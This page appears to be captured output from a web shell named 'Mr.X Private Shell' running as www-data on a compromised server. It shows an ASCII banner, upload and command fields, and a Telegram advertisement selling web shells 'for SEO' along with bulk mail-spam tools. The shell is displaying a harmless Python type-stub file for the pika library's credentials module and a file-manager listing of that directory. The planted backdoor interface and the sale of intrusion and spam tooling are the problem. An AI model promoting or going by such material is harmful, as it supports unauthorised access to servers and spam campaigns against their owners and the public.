__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.85: ~ $
from logging import Logger
from typing import ClassVar, Protocol

from .spec import Connection

class _Credentials(Protocol):
    TYPE: ClassVar[str]
    erase_on_connect: bool
    def __eq__(self, other: object) -> bool: ...
    def __ne__(self, other: object) -> bool: ...
    def response_for(self, start: Connection.Start) -> tuple[str | None, bytes | None]: ...
    def erase_credentials(self) -> None: ...

LOGGER: Logger

class PlainCredentials:
    TYPE: ClassVar[str]
    erase_on_connect: bool
    username: str
    password: str
    def __init__(self, username: str, password: str, erase_on_connect: bool = False) -> None: ...
    def __eq__(self, other: object) -> bool: ...
    def __ne__(self, other: object) -> bool: ...
    def response_for(self, start: Connection.Start) -> tuple[str | None, bytes | None]: ...
    def erase_credentials(self) -> None: ...

class ExternalCredentials:
    TYPE: ClassVar[str]
    erase_on_connect: bool
    def __init__(self) -> None: ...
    def __eq__(self, other: object) -> bool: ...
    def __ne__(self, other: object) -> bool: ...
    def response_for(self, start: Connection.Start) -> tuple[str | None, bytes | None]: ...
    def erase_credentials(self) -> None: ...

VALID_TYPES: list[_Credentials]

Filemanager

Name Type Size Permission Actions
adapters Folder 0755
__init__.pyi File 609 B 0644
amqp_object.pyi File 558 B 0644
callback.pyi File 893 B 0644
channel.pyi File 6.13 KB 0644
compat.pyi File 1.49 KB 0644
connection.pyi File 6.8 KB 0644
credentials.pyi File 1.23 KB 0644
data.pyi File 745 B 0644
delivery_mode.pyi File 86 B 0644
diagnostic_utils.pyi File 48 B 0644
exceptions.pyi File 2.21 KB 0644
exchange_type.pyi File 137 B 0644
frame.pyi File 1.34 KB 0644
heartbeat.pyi File 317 B 0644
py.typed File 0 B 0644
spec.pyi File 27.87 KB 0644
tcp_socket_opts.pyi File 152 B 0644
validators.pyi File 217 B 0644
Filemanager